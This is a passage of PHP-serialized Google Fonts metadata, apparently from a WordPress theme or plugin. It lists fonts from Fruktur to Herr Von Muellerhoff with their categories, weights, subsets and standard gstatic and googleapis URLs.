nQvfEi1LssAvhJsCwH__w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Fruktur:regular";}}s:9:"fugaz_one";a:7:{s:4:"name";s:9:"Fugaz One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/fugazone/v6/5tteVDCwxsr8-5RuSiRWOw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Fugaz+One:regular";}}s:9:"gfs_didot";a:7:{s:4:"name";s:9:"GFS Didot";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"greek";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/gfsdidot/v6/jQKxZy2RU-h9tkPZcRVluA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=GFS+Didot:regular";}}s:15:"gfs_neohellenic";a:7:{s:4:"name";s:15:"GFS Neohellenic";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"greek";}s:5:"files";a:4:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/gfsneohellenic/v7/B4xRqbn-tANVqVgamMsSDiayCZa0z7CpFzlkqoCHztc.ttf";s:6:"italic";s:92:"http://fonts.gstatic.com/s/gfsneohellenic/v7/KnaWrO4awITAqigQIIYXKkCTdomiyJpIzPbEbIES3rU.ttf";i:700;s:92:"http://fonts.gstatic.com/s/gfsneohellenic/v7/7HwjPQa7qNiOsnUce2h4448_BwCLZY3eDSV6kppAwI8.ttf";s:9:"700italic";s:92:"http://fonts.gstatic.com/s/gfsneohellenic/v7/FwWjoX6XqT-szJFyqsu_GYFF0fM4h-krcpQk7emtCpE.ttf";}s:4:"urls";a:4:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=GFS+Neohellenic:regular";s:6:"italic";s:62:"https://fonts.googleapis.com/css?family=GFS+Neohellenic:italic";i:700;s:59:"https://fonts.googleapis.com/css?family=GFS+Neohellenic:700";s:9:"700italic";s:65:"https://fonts.googleapis.com/css?family=GFS+Neohellenic:700italic";}}s:8:"gabriela";a:7:{s:4:"name";s:8:"Gabriela";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/gabriela/v4/B-2ZfbAO3HDrxqV6lR5tdA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Gabriela:regular";}}s:6:"gafata";a:7:{s:4:"name";s:6:"Gafata";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/gafata/v5/aTFqlki_3Dc3geo-FxHTvQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Gafata:regular";}}s:6:"galada";a:7:{s:4:"name";s:6:"Galada";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:7:"bengali";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/galada/v1/xGkllHQb8OOCv9VJ6IObSA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Galada:regular";}}s:8:"galdeano";a:7:{s:4:"name";s:8:"Galdeano";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/galdeano/v6/ZKFMQI6HxEG1jOT0UGSZUg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Galdeano:regular";}}s:7:"galindo";a:7:{s:4:"name";s:7:"Galindo";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/galindo/v4/2lafAS_ZEfB33OJryhXDUg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Galindo:regular";}}s:13:"gentium_basic";a:7:{s:4:"name";s:13:"Gentium Basic";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/gentiumbasic/v8/KCktj43blvLkhOTolFn-MYtBLojGU5Qdl8-5NL4v70w.ttf";s:6:"italic";s:90:"http://fonts.gstatic.com/s/gentiumbasic/v8/qoFz4NSMaYC2UmsMAG3lyTj3mvXnCeAk09uTtmkJGRc.ttf";i:700;s:90:"http://fonts.gstatic.com/s/gentiumbasic/v8/2qL6yulgGf0wwgOp-UqGyLNuTeOOLg3nUymsEEGmdO0.ttf";s:9:"700italic";s:90:"http://fonts.gstatic.com/s/gentiumbasic/v8/8N9-c_aQDJ8LbI1NGVMrwtswO1vWwP9exiF8s0wqW10.ttf";}s:4:"urls";a:4:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Gentium+Basic:regular";s:6:"italic";s:60:"https://fonts.googleapis.com/css?family=Gentium+Basic:italic";i:700;s:57:"https://fonts.googleapis.com/css?family=Gentium+Basic:700";s:9:"700italic";s:63:"https://fonts.googleapis.com/css?family=Gentium+Basic:700italic";}}s:18:"gentium_book_basic";a:7:{s:4:"name";s:18:"Gentium Book Basic";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/gentiumbookbasic/v7/IRFxB2matTxrjZt6a3FUnrWDjKAyldGEr6eEi2MBNeY.ttf";s:6:"italic";s:94:"http://fonts.gstatic.com/s/gentiumbookbasic/v7/qHqW2lwKO8-uTfIkh8FsUfXfjMwrYnmPVsQth2IcAPY.ttf";i:700;s:94:"http://fonts.gstatic.com/s/gentiumbookbasic/v7/T2vUYmWzlqUtgLYdlemGnaWESMHIjnSjm9UUxYtEOko.ttf";s:9:"700italic";s:94:"http://fonts.gstatic.com/s/gentiumbookbasic/v7/632u7TMIoFDWQYUaHFUp5PA2A9KyRZEkn4TZVuhsWRM.ttf";}s:4:"urls";a:4:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Gentium+Book+Basic:regular";s:6:"italic";s:65:"https://fonts.googleapis.com/css?family=Gentium+Book+Basic:italic";i:700;s:62:"https://fonts.googleapis.com/css?family=Gentium+Book+Basic:700";s:9:"700italic";s:68:"https://fonts.googleapis.com/css?family=Gentium+Book+Basic:700italic";}}s:3:"geo";a:7:{s:4:"name";s:3:"Geo";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:60:"http://fonts.gstatic.com/s/geo/v8/mJuJYk5Pww84B4uHAQ1XaA.ttf";s:6:"italic";s:60:"http://fonts.gstatic.com/s/geo/v8/8_r1wToF7nPdDuX1qxel6Q.ttf";}s:4:"urls";a:2:{s:7:"regular";s:51:"https://fonts.googleapis.com/css?family=Geo:regular";s:6:"italic";s:50:"https://fonts.googleapis.com/css?family=Geo:italic";}}s:7:"geostar";a:7:{s:4:"name";s:7:"Geostar";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/geostar/v6/A8WQbhQbpYx3GWWaShJ9GA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Geostar:regular";}}s:12:"geostar_fill";a:7:{s:4:"name";s:12:"Geostar Fill";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/geostarfill/v6/Y5ovXPPOHYTfQzK2aM-hui3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Geostar+Fill:regular";}}s:12:"germania_one";a:7:{s:4:"name";s:12:"Germania One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/germaniaone/v4/3_6AyUql_-FbDi1e68jHdC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Germania+One:regular";}}s:6:"gidugu";a:7:{s:4:"name";s:6:"Gidugu";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/gidugu/v3/Ey6Eq3hrT6MM58iFItFcgw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Gidugu:regular";}}s:13:"gilda_display";a:7:{s:4:"name";s:13:"Gilda Display";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/gildadisplay/v4/8yAVUZLLZ3wb7dSsjix0CADHmap7fRWINAsw8-RaxNg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Gilda+Display:regular";}}s:14:"give_you_glory";a:7:{s:4:"name";s:14:"Give You Glory";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/giveyouglory/v6/DFEWZFgGmfseyIdGRJAxuBwwkpSPZdvjnMtysdqprfI.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Give+You+Glory:regular";}}s:13:"glass_antiqua";a:7:{s:4:"name";s:13:"Glass Antiqua";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/glassantiqua/v4/0yLrXKplgdUDIMz5TnCHNODcg5akpSnIcsPhLOFv7l8.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Glass+Antiqua:regular";}}s:6:"glegoo";a:7:{s:4:"name";s:6:"Glegoo";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/glegoo/v5/2tf-h3n2A_SNYXEO0C8bKw.ttf";i:700;s:63:"http://fonts.gstatic.com/s/glegoo/v5/TlLolbauH0-0Aiz1LUH5og.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Glegoo:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Glegoo:700";}}s:17:"gloria_hallelujah";a:7:{s:4:"name";s:17:"Gloria Hallelujah";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/gloriahallelujah/v8/CA1k7SlXcY5kvI81M_R28Q3RdPdyebSUyJECJouPsvA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Gloria+Hallelujah:regular";}}s:10:"goblin_one";a:7:{s:4:"name";s:10:"Goblin One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/goblinone/v6/331XtzoXgpVEvNTVcBJ_C_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Goblin+One:regular";}}s:10:"gochi_hand";a:7:{s:4:"name";s:10:"Gochi Hand";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/gochihand/v7/KT1-WxgHsittJ34_20IfAPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Gochi+Hand:regular";}}s:8:"gorditas";a:7:{s:4:"name";s:8:"Gorditas";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/gorditas/v4/uMgZhXUyH6qNGF3QsjQT5Q.ttf";i:700;s:86:"http://fonts.gstatic.com/s/gorditas/v4/6-XCeknmxaon8AUqVkMnHaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:2:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Gorditas:regular";i:700;s:52:"https://fonts.googleapis.com/css?family=Gorditas:700";}}s:21:"goudy_bookletter_1911";a:7:{s:4:"name";s:21:"Goudy Bookletter 1911";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:97:"http://fonts.gstatic.com/s/goudybookletter1911/v6/l5lwlGTN3pEY5Bf-rQEuIIjNDsyURsIKu4GSfvSE4mA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:69:"https://fonts.googleapis.com/css?family=Goudy+Bookletter+1911:regular";}}s:8:"graduate";a:7:{s:4:"name";s:8:"Graduate";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/graduate/v4/JpAmYLHqcIh9_Ff35HHwiA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Graduate:regular";}}s:11:"grand_hotel";a:7:{s:4:"name";s:11:"Grand Hotel";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/grandhotel/v4/C_A8HiFZjXPpnMt38XnK7qCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Grand+Hotel:regular";}}s:12:"gravitas_one";a:7:{s:4:"name";s:12:"Gravitas One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/gravitasone/v6/nBHdBv6zVNU8MtP6w9FwTS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Gravitas+One:regular";}}s:11:"great_vibes";a:7:{s:4:"name";s:11:"Great Vibes";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/greatvibes/v4/4Mi5RG_9LjQYrTU55GN_L6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Great+Vibes:regular";}}s:6:"griffy";a:7:{s:4:"name";s:6:"Griffy";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/griffy/v4/vWkyYGBSyE5xjnShNtJtzw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Griffy:regular";}}s:6:"gruppo";a:7:{s:4:"name";s:6:"Gruppo";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/gruppo/v7/pS_JM0cK_piBZve-lfUq9w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Gruppo:regular";}}s:5:"gudea";a:7:{s:4:"name";s:5:"Gudea";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/gudea/v4/S-4QqBlkMPiiA3jNeCR5yw.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/gudea/v4/7mNgsGw_vfS-uUgRVXNDSw.ttf";i:700;s:62:"http://fonts.gstatic.com/s/gudea/v4/lsip4aiWhJ9bx172Y9FN_w.ttf";}s:4:"urls";a:3:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Gudea:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Gudea:italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Gudea:700";}}s:8:"gurajada";a:7:{s:4:"name";s:8:"Gurajada";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/gurajada/v4/6Adfkl4PCRyq6XTENACEyA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Gurajada:regular";}}s:6:"habibi";a:7:{s:4:"name";s:6:"Habibi";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/habibi/v5/YYyqXF6pWpL7kmKgS_2iUA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Habibi:regular";}}s:6:"halant";a:7:{s:4:"name";s:6:"Halant";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{i:300;s:63:"http://fonts.gstatic.com/s/halant/v2/dM3ItAOWNNod_Cf3MnLlEg.ttf";s:7:"regular";s:63:"http://fonts.gstatic.com/s/halant/v2/rEs7Jk3SVyt3cTx6DoTu1w.ttf";i:500;s:63:"http://fonts.gstatic.com/s/halant/v2/tlsNj3K-hJKtiirTDtUbkQ.ttf";i:600;s:63:"http://fonts.gstatic.com/s/halant/v2/zNR2WvI_V8o652vIZp3X4Q.ttf";i:700;s:63:"http://fonts.gstatic.com/s/halant/v2/D9FN7OH89AuCmZDLHbPQfA.ttf";}s:4:"urls";a:5:{i:300;s:50:"https://fonts.googleapis.com/css?family=Halant:300";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Halant:regular";i:500;s:50:"https://fonts.googleapis.com/css?family=Halant:500";i:600;s:50:"https://fonts.googleapis.com/css?family=Halant:600";i:700;s:50:"https://fonts.googleapis.com/css?family=Halant:700";}}s:15:"hammersmith_one";a:7:{s:4:"name";s:15:"Hammersmith One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/hammersmithone/v7/FWNn6ITYqL6or7ZTmBxRhjjVlsJB_M_Q_LtZxsoxvlw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Hammersmith+One:regular";}}s:7:"hanalei";a:7:{s:4:"name";s:7:"Hanalei";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/hanalei/v6/Sx8vVMBnXSQyK6Cn0CBJ3A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Hanalei:regular";}}s:12:"hanalei_fill";a:7:{s:4:"name";s:12:"Hanalei Fill";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/hanaleifill/v5/5uPeWLnaDdtm4UBG26Ds6C3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Hanalei+Fill:regular";}}s:7:"handlee";a:7:{s:4:"name";s:7:"Handlee";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/handlee/v5/6OfkXkyC0E5NZN80ED8u3A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Handlee:regular";}}s:7:"hanuman";a:7:{s:4:"name";s:7:"Hanuman";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/hanuman/v9/hRhwOGGmElJSl6KSPvEnOQ.ttf";i:700;s:85:"http://fonts.gstatic.com/s/hanuman/v9/lzzXZ2l84x88giDrbfq76vesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Hanuman:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Hanuman:700";}}s:12:"happy_monkey";a:7:{s:4:"name";s:12:"Happy Monkey";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/happymonkey/v5/c2o0ps8nkBmaOYctqBq1rS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Happy+Monkey:regular";}}s:9:"harmattan";a:7:{s:4:"name";s:9:"Harmattan";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:6:"arabic";i:1;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/harmattan/v1/xNM1nDKzsLfoCLQtMRztGA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Harmattan:regular";}}s:12:"headland_one";a:7:{s:4:"name";s:12:"Headland One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/headlandone/v4/iGmBeOvQGfq9DSbjJ8jDVy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Headland+One:regular";}}s:5:"heebo";a:7:{s:4:"name";s:5:"Heebo";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"100";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"700";i:5;s:3:"800";i:6;s:3:"900";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"hebrew";}s:5:"files";a:7:{i:100;s:62:"http://fonts.gstatic.com/s/heebo/v2/SoQODIucfpkiveZloUR6ag.ttf";i:300;s:62:"http://fonts.gstatic.com/s/heebo/v2/dg5T18yyjkKiU_9mmcbDSQ.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/heebo/v2/nyHCGMPliplPNqpssbDSIA.ttf";i:500;s:62:"http://fonts.gstatic.com/s/heebo/v2/jDb70ZCwdD6JnmQU62ZQZA.ttf";i:700;s:62:"http://fonts.gstatic.com/s/heebo/v2/NsBYEn6oWei8pPqytA07yA.ttf";i:800;s:62:"http://fonts.gstatic.com/s/heebo/v2/h4CV2Qq56LKIinGGOStvsw.ttf";i:900;s:62:"http://fonts.gstatic.com/s/heebo/v2/uDfzHw3R0Bfa6HyIIcj-ow.ttf";}s:4:"urls";a:7:{i:100;s:49:"https://fonts.googleapis.com/css?family=Heebo:100";i:300;s:49:"https://fonts.googleapis.com/css?family=Heebo:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Heebo:regular";i:500;s:49:"https://fonts.googleapis.com/css?family=Heebo:500";i:700;s:49:"https://fonts.googleapis.com/css?family=Heebo:700";i:800;s:49:"https://fonts.googleapis.com/css?family=Heebo:800";i:900;s:49:"https://fonts.googleapis.com/css?family=Heebo:900";}}s:11:"henny_penny";a:7:{s:4:"name";s:11:"Henny Penny";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/hennypenny/v4/XRgo3ogXyi3tpsFfjImRF6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Henny+Penny:regular";}}s:20:"herr_von_muellerhoff";a:7:{s:4:"name";s:20:"Herr Von 